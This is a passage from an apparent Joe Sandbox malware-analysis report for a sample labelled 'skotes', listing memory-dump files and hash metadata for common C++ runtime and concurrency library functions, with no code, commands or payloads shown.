                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pScheduler
                                                                                                                                                                                                                                          • API String ID: 246774199-923244539
                                                                                                                                                                                                                                          • Opcode ID: f712bacb9ca761ebb7f82c57cbf81b3cb2414e7f3085d709be85348a7f86b6f6
                                                                                                                                                                                                                                          • Instruction ID: 298f803ca30d29a3a112b750ca938ceb7fe0b9b0b00da2b23ab26cd1c6d6ccf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f712bacb9ca761ebb7f82c57cbf81b3cb2414e7f3085d709be85348a7f86b6f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78F059B5A00204B7C7A0FA98DC42CEEB37B9E90714B10C12DE40517281DF71AE86CB96
                                                                                                                                                                                                                                          Function 006D67A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1635606685-0
                                                                                                                                                                                                                                          • Opcode ID: 5b708b2c9a3e8d20e4f28ed9c7507869134727fe11a3e7b3aa7e3cfd72724393
                                                                                                                                                                                                                                          • Instruction ID: 46987daaefd113aac18a6df11b2e4b35a9cc8a4db3b15deccaf55b8d58ce7dbb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b708b2c9a3e8d20e4f28ed9c7507869134727fe11a3e7b3aa7e3cfd72724393
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C281BE72E0024A9BDF209EA5C891EEE7BA7DF09314F19415AF841BB341E7358C459BA0
                                                                                                                                                                                                                                          Function 006C504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                          • Opcode ID: 652165df6266fd4b89dbff1ec4c4fa38ac853b3aaf9aa8dd3fb122bea264bf39
                                                                                                                                                                                                                                          • Instruction ID: 38649942f567d5ebb11e5d642a0cac390f90e644ba756359aae3293dd4c69980
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 652165df6266fd4b89dbff1ec4c4fa38ac853b3aaf9aa8dd3fb122bea264bf39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6451B071601A06AFDB259F54DC85FBA77A7EF11300F19452DE8038BA91EB31BD81CB91
                                                                                                                                                                                                                                          Function 006C4C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1707706676-0
                                                                                                                                                                                                                                          • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                          • Instruction ID: 1590a19df27332b3d23598db4134cb44fa8341e53e13772f1e89e56e97734399
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C517735A042099FCB11DF68C4A0BFEBBF6EF15354B14449EE852A7361DB32AA45CB90
                                                                                                                                                                                                                                          Function 006BDB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BDB64
                                                                                                                                                                                                                                            • Part of subcall function 006B8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 006B8F50
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 006BDBC3
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 006BDBE9
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 006BDC56
                                                                                                                                                                                                                                          Memory Dump Source
